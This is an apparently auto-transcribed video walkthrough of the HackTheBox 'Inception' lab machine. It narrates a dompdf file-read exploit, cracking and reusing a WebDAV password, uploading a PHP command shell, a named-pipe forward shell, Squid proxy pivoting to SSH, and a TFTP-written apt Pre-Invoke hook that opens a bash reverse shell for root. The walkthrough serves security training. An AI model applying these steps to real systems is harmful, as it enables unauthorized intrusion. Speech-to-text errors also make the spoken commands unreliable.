What's going on YouTube? This is IppSec, and we're going to be doing Inception from HackTheBox, which is a pretty darn cool box. It starts off with just port 80 and a Squid proxy being exposed. You're supposed to hack around the website, get remote code execution that allows you to dump some credentials. Then you can use the Squid proxy to access programs listing on the loopback addresses of the box, much like the Joker video. You access SSH, use the credentials, gain a local shell to the box. And you couldn't do any reverse shells because the box can't actually route to you. You can route to the box. If you use that forward shell technique I showed in the Sokar video, you can actually do this whole box without using Squid. But once you get a local shell on the box, you escalate up to the root user and find out you're in a guest VM because there is no root.txt. You then have to look at the ARP address table, notice that there is a box it's talking to, which is the gateway. Exploit that box, the host OS, and that's where the root.txt file is. So it's a pretty fun box. Let's just jump in. First things first, we start off with the Nmap scan. So Nmap-SC for default scripts, SV enumerate versions, OA output all formats. Put in the Nmap directory and call the file's initial, then the IP address of Inception, which is 10.10.10.67. It does take time, so I've already ran this. Let's just look at the results. We do see two ports open. HTTP is listening on port 80. It is a Ubuntu server, and it's version 2418. So if you Google this, you could find out the exact distro of Ubuntu running. And we also have HTTP proxy known as Squid running on 3128. We'll look at this in a little bit, but first things first, let's just look at what's on port 80 because normally that is interesting. So 10.10.10.67. And we just see a page. We can try putting in something in the email address and click sign up. It has some JavaScript to verify it's an email, so just put something in fake and click. We do get a thank you, so let's send that over into burp and test one more time, a@b.com. Make sure burp is intercepting to see if we can figure out what that JavaScript is doing, or what that page is doing. As soon as we click sign up, we get a thank you, and nothing happened in burp. So let's press Ctrl U to open up the source. And right off the bat, we see the HTML ends. These numbers keep going, and looking at the slider, it goes way down. At the very end, we have to do test dompdf on PHP 7. So we know we have to look into that. Let's take a look at the JavaScript file and see if we can figure out what is happening. So it says thank you when you sign up, so let's just search for that string. And right off the bat, and I said right off the bat a few times, so I'll stop that, but we do see a note here that says it doesn't do anything other than respond with thank you. So we can stop looking at this page and take a look at what was in that source all the way at the bottom, the DOM PDF. So let's just put DOM PDF in the URL because I assume it's going to be on this server somewhere. So we could do dompdf.php or other things, but a dirbust should focus around dompdf. And before I threw in dirbuster, I just did /dompdf, and we see that we do get a page. It doesn't exactly load. We can click on the version, and we see it is 060. Click on the README. It responds back. We can open up in a text editor and see exactly what it is. The requirements are PHP 5, so maybe that's why it says test it on PHP 7. I would probably go to Google and try to figure out when dompdf 060 got released. Maybe we'll just search dompdf CVE and see if we find anything for 060. So before 061 in 2014, it had a LFI, and it says using protocol PHP wrappers in the input file parameter as demonstrated with this. And we can also do a search exploit on dompdf to see if there's anything in exploit.db. This one looks like exactly what we just read. We have one in beta. Let's ignore the beta one because 060 is the exact version we saw in the README. Or not README, in the version file. So we can do a search exploit -x for examine, and then paste in the path to open it up. And this is a bit more detailed than the actual CVE, so it gives us a proof of concept right here. Let's just test that out. We just have to replace example with 10.10.10.67, and then add the dompdf folder before dompdf.pdf. That's a lot of PDFs. And for the file, let's start off with etc passwd, because that's normally, or it has to be, I think, world readable. And we do get a PDF document. We can open it up with a PDF reader, and we do see a lot of base64 strings. So if we copy this and paste it, so we do echo-n base64-d. It looks like my copy didn't get the entire string because that's pretty small for an etc passwd. But we do see it's turning off. So let's just intercept this into burp. So go to HTTP history, click on the request, Control R to send a repeater, click go, and we can see the results. It is a PDF, and scrolling down we see more base64 than we copied, so we can just copy this, do echo-n base64-d, and we can see we do get the passwd file. And there is also the user cob on the machine. So we have to probably create something to make this a bit easier, because doing this every time is a pain. But before we do that, let's see if we can get any command execution. So if we can probably trick this to read data, we could insert PHP and try to get code execution. So let's try a few other files. We know this server is running Apache. So let's try var log apache2 access.log. We don't get anything. We get an internal server error. So let's just put an invalid file and see if we still get this 500. So we do. So we know maybe if we can't read the file because of permissions or the file doesn't exist, it says 500. So that doesn't really help us that much. If we just put a folder, we get error 500. So we can't even enumerate folders. So the next thing I do is enumerate the Apache configuration. So Apache 2, we can look on our machine, because Kali's based upon Debian and Ubuntu is based upon Debian. The Apache configuration is probably going to be the same. So if we do etc apache 2, we can look at apache2.conf and see where the log files are being written to. And there's a good chance this isn't readable by our user, but it's still something good to check. If we didn't want to do base64 every time, we can probably just change this convert base64 to string, and then just read it here. But man, is that ugly. So I'm going to undo that, and I'm going to write a script to just automate this, because looking at files individually is a huge pain. Actually, I lied. One last thing to check. Let's Google PHP Wrappers and see if we can get code execution. Google that with code execution. See if we find something. This one may be good. And we can look a little about wrappers, what they are. If you just Google PHP wrappers, go to this manual, and you can see different things you can do, like access files, URLs, PHP, compressed files, which are good if you have file uploads, SSH, that's an odd one, expect. But going to this blog, we can try to see a few things. I hate skimming in videos, so we're just going to do it. One of the wrappers is the expect. So if expect is enabled on the server, we should be able to just do expect ://id, and we can't. So that one's disabled. Then we could try data text/plain, comma, something. So we'll do test. And that gets an error. So these are the two common methods of testing that. We can test a bunch of other files, so we could try doing, what was that, PHP? Read proc self environ for environment, and this may tell us what environment variables that we may be able to control, or at least the user HTTP is running as, but we can't access that either. So now we can actually begin writing the script to automate exporting files. So let's open up V and create the file inception-read.py. We know we're going to need the request module. Also, we're going to need to be able to base64 decode. So we're going to do from base64 import base64 decode. And the reason why I'm avoiding the string wrapper, if we went back to that Etsy Apache to apache.conf, I think. No. I wish I could remember that location. Apache2.conf. If we look at this and just didn't base64 encode it, so read equals string, we can see it's probably going to be doing a lot of escaping that doesn't naturally exist. Like everything with a parenthesis has a backslash before it. So that's why I just want to base64 so I don't have to deal with it actually modifying the output. And then, what's another thing we need? Import regular expressions, because we're going to have to grab the output of the page and grab only the base64 piece. So I'm going to create a function called getFile, and I'm going to pass it the parameter file. And we have to create our payload that we send to the server. That is the actual argument. So if we just copy up to resource, it'll be a lot easier. So input underscore file colon this plus file. Then we want to actually send the request, so we can create a new variable called response and do request.get the IP of Inception, which is 10.10.10.67, then the path to the vulnerable program, which is dompdf.php. Then we can specify the parameters we want to send, or a payload string. Then we want to grab the text of that request. Then we want to strip any spaces at the end, or empty lines. Let's see. That's good. That closes that parenthesis, so that is good. Now we need to create or just grab the base64. So we're going to do b64 equals re for regular expression. That's the module we had imported, dot search. And we have to find something in the response. So let's go over and look at this. We can see the string begins with a bracket, then a parenthesis, and those are our special characters. So I'm going to put backslashes before them to escape. And then we want to grab everything. So we need to put another parenthesis, because this tells regular expression what to match. We'll do dot stir question mark, and that will copy everything but, I think, new lines, because we didn't specify that. And then it ends with a parenthesis and bracket. So let's put that as well. And we want to grab the very first match. So we'll do group 1. And then we can return the base64 decoded output of b64. So that should be that function. And we can just call this real quick to test it out. So get file etsy passwd. So if we execute that, we get no results because I did not print it. There we go. It looks a little bit ugly. It encoded this all as a byte, so let us try to decode this. So we can do print, get file, maybe we can just do decode. Does it have that function? It does. So decoding it decoded the binary format to a string. And the reason why I said binary is because it had B, then this single quote. And I hope that means binary. And we also see the slash ends where line breaks are supposed to be. This still isn't really that efficient, though, for grabbing a bunch of files and doing good enumeration. So we can do a for infinite loop and say cmd is equal to input. Then we can try this function. And the reason why we're doing a try is because if we get an actual error, we don't want the program to crash. We just want it to tell us, hey, you made a mistake. So output is equal to get file cmd. Then we can print output dot decode. Then add the exception handler. It's accept. And then just print error. So if all goes well, we should have a nice little program. So we input etc pass wd, and we get pass wd. We could do etc hosts, and we get that file. So let's poke around this box and see what there is. So let's do proc self environ, nothing. Proc self fd0, can't access that. And this is just trying to enumerate information about this process. So we can't get into proc self. Let's move on. What would be another good thing to look at? etc shadow. If we were root, we'd be able to read that. We can't. So we're probably the HTTP user. Normally, Apache's not running as anything else. So let's look at the Apache config again, because it was ugly. And I have a typo there, etc apache2, apache2.conf. And that is much prettier. So where is the log file stored? Is it verlog apache2? Should just search for log. So do a /log. Nothing there. Hostname lookup, no. Error log, so Apache log directory, error. Let's see, do we know what that is? I don't know where Apache log directory is stored, but let's look at the actual site config. So if we go back to a Ubuntu machine and go into etc apache2, we see there are mods-available and sites-available, and sites-enabled. Sites-enabled will probably be the best one to look at. So 000-default.conf. So if we do etc apache2 sites-enabled /000 default.conf, we do get some results. So we got virtual host *80. It's serving out in the var www HTML directory. And we also see there is a WebDav test Inception directory. And it's requiring credentials. And the credentials are in this file. So let's grab that file. And we see they are hashed, and the user is WebDav tester. So now we have two users in this box, WebDav tester and Cobb. So we may want to start creating some good notes. So we just do users. We got Cobb, WebDav, tester. Don't really have any passwords yet, but we should be able to crack one. So copy that, go into the Kraken, and this is just one of my computers I use to crack passwords with. I could do the VM, but VMs generally don't like password cracking, especially when I'm doing video recording, so that's why I'm using a different box. So if we do hashcat, I have a folder called hashes, and this will be inception.hash. Paste this. And I'm not sure exactly what that format is. We could do hashcat-h and probably guess from looking at this. However, I don't like using that. I like just Googling hashcat example hashes. And the reason why I like this page more than the actual help of hashcat is it gives us examples. So it started off with a $APR, and right off the bat we see that is the Apache format. Example hash, this looks like exactly what we have. It is 1600. So let's do hashcat-m 1600. Specify the hash, so hash is inception, and then a word list. And since it is CTF, I'm just going to specify rocku.text first. We don't have to do anything fancy. If it's meant to be cracked, it's normally in the rocku thing. And you don't need a bunch of graphics cards to crack this. It's a relatively quick thing. Again, I just hate running hashcat in my VM when I'm doing other things on this machine like recording. Start off and we get the password cracked right away, babygirl69. So let's go back into our notes and create a PW thing and just paste that password. I normally use Cherry Tree or something when I'm actually taking notes, but for this, just creating text files is fine. And the reason why I like Cherry Tree is you also have hotkeys to take screenshots, and that just makes life easy. I don't have exit on that, so we can stop that and look at what is in that WebDav directory. So let's see. It is 10.10.10.67. It was WebDav_test_inception. We got a username. It was WebDav tester. The password was babygirl with a U 69. Get a forbidden message. So let's test if we have upload privilege to WebDav. And I believe this was back on Granny and was a Windows XP box that we did this with. Or maybe it was Grandpa. It was one of those videos. But we can do curl. Actually, before we upload a shell, let's copy it here. So op shell php cmd.php. And we don't need these characters at the beginning. I forget what video we put those in, but that is just stuff to make it look like an image. If I do file cmd.php, no it's not. Maybe that got clobbered. That's normally what I do, but I guess I don't even have to worry about that there. So just clean that up. If you want to see the file, it's very simple. Just echoing the results of a system command and getting the parameter IP. So let's upload this file. So curl --upload -file. Then we can specify the file name, which is cmd.php. Then we gotta say where to upload it to. So http://10.10.10.67 WebDav test inception. And WebDav is kind of like a web file browsing protocol that allows uploads and stuff. So that's why I'm testing this. And we can specify the user with --user WebDav_tester : the password babygirl69. And I probably should specify the file name and the destination. I don't know if I have to or not. Didn't get anything back. That is odd. So I'm going to do curl-vvv. And we're completely uploaded and fine. So it looks like it did upload the file. So if we go to cmd.php, we don't get a forbidden. If we went to something that didn't exist on the server, we get not found. So we can say ip equals ls, and we get a shell. So if we wanted to, we could take a shell from one of our previous videos, like Sokar, which was a Vault Hunt machine I did not too long ago. And I'm going to take that shell because it's like 70 plus lines of code that I don't feel like retyping. So I'll explain the shell quickly. And if you want to watch me code it, you can actually just watch the Sokar video. So move that to Inception -run.py, I guess. I should have named that shell, but oh well. There we go. So we have a few modules. We have the request, time, so we can do sleep, base64, random, you'll see when we use that, and threading, so we can run something in the background. So we got this thread that's just running a loop constantly. Then Circo was a shell shock video, so we have shell shock here, and we're writing the command we want to execute into a file to run it. Actually, it would be easier if I just show this one small part. So the theory behind this thing is to get a TTY over HTTP requests. And I guess I could show you, I kind of jumped ahead, that we can't do any reverse shells because there's a firewall. So I forgot that enumeration step. So I guess we can, I don't really have time to show that, so apologies. But if you did a bunch of reverse shells, you'd find out they don't work. So that's why I jumped over to this. And we can grab, it didn't copy, so I'm just going to do this to copy it. So you'll notice this looks very similar to the reverse shell we normally do with netcat, except instead we're doing it with files. And we have to create two files. So we'll do temp input, and temp output. So we're creating a named pipe at /temp input, and then we're going to be reading that name piped, and then sending everything over to bash, and then having bash send it over to output. And what this allows us to do is kind of establish a persistent shell, because if we just send commands one at a time, we don't keep it. So if we did like cd ... and then did another command, it reran the shell from the beginning and we don't keep that session. So this enables us to keep that. So if we run that command, we see it hangs. But if we echo who am I into temp input and then read temp output, we get the results of that command. We can also do that like ifconfig to show it. So that's exactly what the script is doing. And the reason why we have thread is because the request finishes immediately and we want to read the file or output file like every second so we can get the results. We have to fix this to be not shell shock. We'll just use our PHP script that we uploaded. So get rid of, actually, we'll just name this payload. And we want to have the payload be ip, because that's the parameter we send to execute code, is ip. Get rid of shell shock. and echo or command base64-d sh, and I think that may be all we're doing. Yeah, I think that's it. So edit the actual request to be request.post. Have to fix that IP. We'll fix that later with a sed because we have to make that change multiple times. We can fix headers with a sed. We'll fix everything with sed. So %s for search and replace, or sed, and then 172.16, 10, 138, 591. Then we'll escape CGI-bin and escape that /2 for cat. And then we'll replace it with 10, 10, 10, 67. Escape the slash. Was it WebDav test Inception? Is that the folder? Yep. Escape that slash. cmd.php. Do a global search and replace. It should replace it in 2 places. And we type that correct. So now the next thing we have to do is replace the headers. So headers equals headers. We're going to say that is now params is equal to payload. And params is the parameters for a post request, and payload is this variable that we just created. Okay? And we also have to add our authentication, because if we're unauthenticated, we can't hit that file. So auth is equal to WebDav tester. I believe that was the user. And then the password is babygirl69. And we actually have to put that in quotes. And that should be good. Go down here, just hit period to redo everything we did with that session, and that did not work. So we'll just retype it, WebDav tester babygirl69, and I need auth. Okay. Clean this one up because we don't need shell shock. We need yep. Okay. And this is payload. And if this is all complicated, we actually don't have to do all of this. There is another route to go, but this is the route I had done on the box when I was doing it. So I'm showing you that first, and then I'll show you the other way to go about it. So that all looks good. If we do a Python 3 on this, we'll hope we got everything correct. And we did not. We forgot a comma. So after this auth, we need a comma, and probably did the same mistake here. Okay. And we probably, I guess, want a space here. Guessing? No. Oh, auth equals. There we go. So it's creating a shell, and then if all goes well, we can do ls and see files. So if we go up a directory, do a ls, we see a actual WordPress directory that we didn't see before. So we can look in this, do another ls, and we got wp config.php to look in the database. And we can grab the credentials for WordPress. We got root and then this password. So we can try to SU to see if the MySQL has the same password. We didn't get any response back. So this is where this shell comes in really cool, is we can just do Python C import pty.spawn, then bash. And because it's the persistent session and not just erasing every time, I think I made a typo there. Should show something back. An echo password. It's not. So we do which Python. Python 2 is not installed. Do we have Python 3? We do. So we can do Python 3-c import pty.spawn, bin bash. And that's what I'm expecting to see. It looks like we have loaded bash. And we should be able to now do a su dash. It's asking us for the password. We can paste the password. Do a who am I. Authentication failure. So we know there's also the cob user. So let's try that. And cob user had reused that MySQL password. The other thing we could have done is like MySQL-u root-P. And MySQL is not found. netstat-alnp grep for 3306, which is the MySQL port. netstat-aln p grep for listening. And we have MySQL isn't even installed on this box. So that is why I didn't go digging into the MySQL database when I saw that password and immediately started trying it with user passwords, because why would a person put a password in that configuration file and try to set up WordPress when there's no database? We could also go back up and see the host is on localhost. So that was the clue that made me try different users with that. So we can do a sudo-l to see if cob can do anything. Paste the password in. Do a who am I. Well, look at the output of sudo. And we can see he may run every command on it. So sudo su. And we are root. So if we just went to the root directory, we should be able to cat root.txt and get the flag. Unfortunately, the flag is not there. It just says you're waiting on a train will take you for a wake up to find root.txt. So it's not there. And before we continue, we could keep doing it in this shell, but I'm going to show you the intended way to get up to this root path. And that is through SSH. If you did the ALNP, you see it is listing on SSH, but we didn't see that before. It is on Squid, so if we had actually went back and enumerated Squid, we would have known to use Squid to proxy back to the box, kind of like a server-side request forgery, and then we could access the SSH port and just SSH in once we found this password. So let's go here, vpw, put the password we found, and look into Squid. So let's go to Firefox. We can do options on Foxy Proxy, and we can edit. We'll just add a new proxy and say 10.10.10.67 on port 3128, and then click OK. Is there something on general where I can give it a name? We'll name this Inception. Close that, right click here, let's load Inception, and then go to 10.10.10.67. Access is denied, but we're not getting a user prompt. So I'm going to try 127.0.0.1, and we get on the page. So it went to Squid and told Squid, hey, go to localhost, and pulls up the page. And another video that has Squid is Joker, if you want to take a look at that. But since there's no credentials in this, Makes it really easy. We can just edit ProxyChains.conf, and ProxyChains is a program that makes non-proxy aware things proxy aware. So let's just add a thing to say HTTP, because that's the type of proxy Squid is, the location, which is 10.10.10.67, and the port 3128. And then now we can send any command through the proxy. So if we want to do ProxyChains Nmap, and we have to specify full TCP scans. By default, it does a SYN scan, which only sends that first SYN packet and watches for the response of the server. If it's a SYNAC, it says the port's open. We can't do that through a proxy, so we have to do the full TCP scan. And then the IP address, which is 10.10.10.67. And we know port 22 is open, so to make it go fast, we're going to specify port 22, do -n for no DNS. And 10.10.10.67, it's saying it's closed. Let's tell it to go to 127.0.0.1 because it's not listening on the global interface, it's listening on 127.0.0.1. And we see SSH is open. Let's look at my local box, nmap-p 22, 127.0.0.1, just to make sure we didn't just nmap ourselves. And we see my local box has SSH closed, so we know we should be able to SSH right in, so leave that ProxyChains command there, do SSH cob at 127.0.0.1, put the password in. I guess I copied something. So cat pw, grab the password, put it in SSH, and we can do the sudo su to escalate to root. And now we have a real shell, and we don't have to use that crappy Python thing we have been using. So the next step is to find that root.txt file. So let's run Linux enum to see if that helps us at all. But to do that, we have to put it on the box. So we're going to cat opt Linux privask linenum.sh, and you should be able to just Google this and find it. If you just Google linenum.sh GitHub, xclip selection primary. That should put in my clipboard. linenum.sh, paste. Maybe try the other clipboard. There we go. And before I do that, we can look at ifconfig to figure out why we didn't get the reverse shell. We see 192.168.0.10. This box's IP is 10.10.10.67. So we're either in a VM or there's some weird NAT. There's something weird going on because I don't see the IP we're accessing this box with. So let's run linenum and see if that helps us figure out what's going on. Can take a little bit to run. Oh, I forgot to revert this box. There's a lot of weird stuff in a folder. Let's just go to the results while we're waiting. Okay, we're at the top. So we got the standard Ubuntu information, Ubuntu 16, Xennial. Nothing too interesting there. The host name, users that are logged in. Of course, Cobb's logged in. That is us. Group memberships. We got root and Cobb. We can read the shadow file because we're running this as root. There's the sudo password. Root's home directory. A lot of weird stuff in it. Permissions on home lax, of course. Files owned, of course. We're not looking at anything to do with reading or writing files because, well, we're root. Of course we can. SSH keys, shells, cron jobs, contents, network. We got something in the IRP history, 192.168.0.1. That is the gateway of this box. Listening TCP and UDP, not too interesting. Processing binaries, pseudo version. I actually don't think it's doing what I wanted it to do. And that's the output of the mount command. That's what I've been scrolling to look at, and don't see it. So if we just ran mount to look at what's mounted, we see a bunch of LXC stuff. LXC is Linux containers, and if you went to the Calamity video, I kind of explained that a little bit because we used LXC for privesc on Calamity instead of doing that giant buffer overflow. But the odd thing is, it's an LXC thing, and we only have one interface, and that's not the interface we wanted. So we can guess that we are in the guest OS, and 192.168.0.1 is probably the host OS. So if we do which nmap, we don't have nmap on this box. We can probably ping 192.168.0.1. And if we wanted to nmap, we could go back to our box and say nmap-ProxyChains, nmap-st on 192.168.0.1, and then do -OA to output all formats in the nmap directory and say gateway, we'll call the file. And that's going to take a while to run, probably. Before we do that, we have to do -PN to not ping through the proxy chain, and then -N because we don't care about DNS. And then we see it trying a bunch of ports. If we wanted to do this a little bit faster, we could just install Nmap on this box. Forget what video I did it. If you probably YouTube IppSec Alien, it'll pull up that video. Maybe it was 1010's video. I don't know. But there was a video where we installed Nmap, and we actually grabbed, I think, the RPM and converted it to a deb. Or we grabbed the deb and converted it to an RPM. But if you wanted to, you could just statically compile Nmap, or pull a statically compiled Nmap from the internet. Static compile means it just adds all the dependencies in the binary, which makes it bigger, but it also makes it so, well, you don't have to install dependencies everywhere. So if we just Google static compile Nmap, make sure we're not going through the proxy. We get a guide on how to do it, but then we also get a GitHub page with a bunch of static binaries. So we'll just go to the GitHub page. And right off the bat, we have Nmap on 64-bit. If we go to SSH, uname-a, we see we are 64-bit. If you want to look at other binaries, there's just loads and loads of them. But Nmap is what we want. View the raw. We can just copy this link location and do wget on that file. It's resolving the host. It's taking a while. That is on Inception. We have to do back on our Inception box. So wget the file. And we can move Nmap or rename it to be static-nmap. I didn't want to just do Nmap because I got a folder Nmap, so I had to name it something else. And then to upload the binary, we could either base64 encode it, but that's a few megabytes and that would take a while. So the best route is to just do a upload file command. The same exact way we upload the PHP shell. So we can do curl -- upload file, static nmap, specify the user, and we'll specify location. Add -vvv so we can see the headers. And it hasn't finished yet. We completely uploaded the file. We got 201 created. So if we go back to SSH, go var www html WebDav test Inception, we do have a static nmap created. So let's just copy that into dev shm. And we can see my script creating random things here. So we can do chmod +x static -nmap. And then if we execute this, we have nmap. Looking at the results, it said everything is closed. That is odd. Something should have came up. Maybe that proxy can't hit 192.168.0.1. I'm not exactly sure what went there. What happened? It's the IP, right? Up-A, AN, don't do DNS, 0.1. Is that what I have? 0.1. I really hate that. Yeah, I'm not sure why that's happening. Normally you can use ProxyChains and Nmap through it. I guess not on this case. If you want to do Nmap through a proxy, SOCKS proxies work much better than HTTP, I've found. But let's go back to just getting Nmap on this box. So if we go to this page, I wonder if he says something here. Whoops. Back. Static binaries. Notes. It wants us to set that Nmap directory so we can tell it where the actual Nmap scripts are. So if we want to do scripts on Nmap, we should copy scripts to the server and put them in this Nmap dir. So let's do that, because scripts are a nice thing to have with Nmap. So we can do locate, NSE, $, I think we've specified -r for regular expression. And where are they? User share Nmap scripts. This is what we want. So let's create a tar, CVF. We'll do capital, is it capital X? I think it's capital J for XZ. Capital X would make sense, but I think it's capital J. nmap-scripts.tar.xz. Paste the directory we want. Oh, we tarred it inside of that. We don't want the full path. We just want it right here. I'm actually going to copy a tar in a tar, which is going to be ugly, but oh well. So let's remove that file we had created. So we have .tar.xz. If we do upload file, we can now upload this to the server. So nmap-scripts.tar.xz. Created it. Go back to Inception. In our folder, we can extract it, tar x capital J VF, nmap scripts. Let's see. Extract, capital J. MV nmap scripts /temp. Let's try this. What if it just doesn't have XZ on the server? Dir xjvf. Yeah, my box extracts it, so let's, instead of compressing it, let's just not compress it. And then we can upload that file. Created. Move this to temp. Dir xvf and map scripts. I have J as a habit. Okay, and we have it copied. And it copied user share. And we can create. Let's go back. And we can move user share Nmap into user share. And if we go execute Nmap, which I think I put in dev shm, we should be able to do dash capital S C SV. Actually, before we do that, read this and set this variable. So we can echo Nmap directory. We see we don't have that environment variable set, so export nmap dir is equal to user share nmap scripts. That's where it is. And I think it just wants user share nmap. I probably should have copied user share nmap instead of specifying the script directory. We'll see what happens. What's the worst that can happen? So nmap-sc, sv, and then the IP address of the gateway, 192.168.0.1. We have to do /static-nmap. Fail to initialize script engine. So let's copy user share nmap. CVF. I don't know if that actually is going to fix anything. And this is why I should always do more testing before I record a video. Because you always run into small things you don't expect. So if we just go to /, we can dir xvf ver dub HTML WebDav test Inception and nmap.tar. Okay, let's rerun that command and hope for the best. Nmap-sc sv 192.168.0.1. We don't have nmap in the path, so we can do that. Still errored. Oh, these NSE scripts require a newer version of Nmap. So we'd have to statically compile a new version of Nmap to make these scripts work. So we're just going to ignore scripts and just do /static nmap on 192.168.0.1. It would help to actually read the error message before we go out and troubleshoot. It shouldn't take too long. And it's done. We got 3 ports open: SSH, DNS, and FTP. So the first thing I'm going to do with FTP is just try Anonymous Login. And we got the banner 303. So since we saw a version, we can search exploit vs FTPD. And we don't have anything for 303. So specify the user anonymous, and it logs us in. So there are a few files we want to look at. Let's go to cd proc self and get environ. Fail to open. Let's go to net, and we can get TCP 0 bytes, get UDP 0 bytes. If we actually had files there, we can switch to ASCII and try to get it. Had bytes, this would be which ports are open on the box. So we wouldn't have to do a full Nmap scan or things like that. So let's see, what else can we get? Let's go to Etsy, get passwd. Got that. Let's see, what else can we get? Let's go to init.d, see what services are running on the box. We got AppArmor, CheckFS, cron, wclock. There's LXD there. We got a TFTP service. That is interesting. So let's get that. Was it tftpd-hpa? Transfer complete. Cat that file. Let's see. At the beginning of this, it says the default for the configuration is probably in Etsy default tftpd-hpa. So let's FTP again. See, I wonder if this has tmux. Could have FTP. Tmux? We do. So I have my tmux right now bound to Control B for the modifier, so every time I want to do a split pane, I just hit Control B twice, and now we can have multiple windows and Inception. Hit Control B twice, and then let go of up. There we go. That's why I sometimes bind the modifier of my host OS to Control A, so I don't have to do that, because sometimes hitting Control B twice just doesn't work. But now that we have two windows into Inception, we didn't have to do that SSH twice, which we probably could have, but oh well. 192.168.0.1 Anonymous. And let's see. Etsy default. And we wanted tftpd-hpa. And we can cat that file. And we see it's running as root, port 69, and we can create files. So let's try that. So we can do tftpd 192.168.0.1. Not the TFTP. And cd temp. Can we cd? No. I guess we can only put and stuff. So put. Before we do that, let's create a test file. Exit. Touch. IppSec. TFTP again. We can put IppSec in /temp. And we have to specify the path, so put IppSec in /temp IppSec. We can go to temp and FTP. We see IppSec is created, and its UID is 0. So we have actually created a file as the root user. So we know TFTP is actually running as root. So the next thing we're going to do is try to get root.ssh ID_RSA. File not found. Get root.ssh. File must have global read permissions. Get root.junk. File not found. So unlike the file read when we're doing it over HTTP, we can now enumerate what are valid folders and not, because we have file not found versus global read permissions. So this error message is a bit more verbose, which gives us more information. What are other good files to get? We can get Etsy shadow. must have global read permissions. Git verspool crontabs root, file not found. So we can probably create a cron tab for root. So let's try that. So if we go back up here, we can exit FTP. We can create a file called root and say every single minute touch temp pwned. And now we can put root and verspool crontabs root. Oh no, crontabs root is all we want. File not found. Oh, no, it is root twice. No, it's not. I screwed up. Put root verspool root. No. Cron tabs root. I think I was screwing that up the whole time. Yeah. So we can get that file verspool cron tabs root. Nope, can't get that file either. So even though we're the root user, we're having a lot of trouble pulling configurations we want. Make that completely big. Let's see, what else can we do? Get etc crontab. If we look at etc crontab, we do have a cron running every 5 minutes. It's an apt upgrade verlog apt custom.log. So if we create a pre-invoke script for apt, we can actually get command execution. So there is something to do a configs before and after you run apt, and we can actually configure that. And we do so by creating a file in etc apt.conf. So let's go back up here where we can create files. We're going to create 00 shell. It can be called anything. I think order of execution is based upon file name, so 00 executes first, 01 executes second, etc. But the actual thing we do is apt update pre-invoke, and then bin bash temp. We can do IppSec.sh. So if we upload this file to the server, and before we do that, we can go back to FTP Anonymous cd temp. We never created pwned, so that cron tab never ran. And I think it's because the file is word readable, and for the crons, I think it has to be a bit more secure than that. But I digress. We have to create that IppSec file. So v-IppSec, that'll be bin bash, and it will be bash-i dev tcp ifconfig 10.10.14.30 10.10. Actually, I don't know if the box can route to us, so this is where having TMUX installed on the server is nice, because we don't have to open up 100 sessions to the box. 192.168.0.10, and we'll say port 8000. See if that command works. And if that doesn't, I guess we can do ping-c 192.168.0.10, and that will tell us it ran. Most likely, that box can ping us. This bash command may not actually work, but ping definitely will if it executes. 0.10, there we go. So now we gotta upload these files. So if we cat, let's just clear that, cat 00 shell, and we can do put 00 shell and etsy app.conf.d /00 shell. That should put it there. And we also got to upload IppSec.sh. So IppSec.sh and temp IppSec.sh. Okay. NC LVNP 8000. Oh, thank God NC is on. I was about to cry. I was like, I never tested if NC is on this box. So every minute this should run. And it should also TCP dump -I ETH0 ICMP. We don't have TCP dump. That's splendid. So that ping isn't actually going to help because we don't have TCP dump. Date. So in about 30 seconds, we may get a shell, we may not. So I guess one thing we can do quick, if we're fast, IppSec.sh, we do get a shell from the guest. So chances are, if the guest hasn't installed, the host will as well. I think I just missed my window. NCLVNP 8000. Why is my control C in this window going through to that window? Oh, probably because I'm pinging. Maybe it's not ping. Maybe it's not -C. Maybe it's -N. No, -C works. It's not ping. PS EF grep IppSec kill 4333. Okay, let's start that again. NCLVNP 8000. Listening. Oh my god. I'm just one in hell of commands, so I think that window closed. Date. So in about 40 seconds, we should get a shell. So I'm going to pause the video, and we will resume in probably 40 seconds. It's been about 40 seconds, so we should get a shell any second now. There it is. And it looks like it may have errored again. We dropped back to pretty much the same exact prompt. Whoops. We're in temp and we were in dev shm. Who am I? We are root. IP ADDR for address, and it looks like we are on the root machine. So I guess I don't understand why the machine got its name. The user and host name for the guest and root are the exact same. So if you didn't notice the directory change when we got that shell, let's scroll up. Let's see. Right here, then you may have just not noticed you got the reverse shell, because it looks like, based upon this error message, you just crash and get dropped back to your shell. But from dev shm to temp, and yeah. So if we go to root, wc-c for character count, because we don't want to show you the flag. 33 characters, MD5 sums 32. You got one line break, so this is the host machine, and that is your root.txt. And this concludes Inception. Hope you guys enjoyed the video. Take care, and I'll see you next week.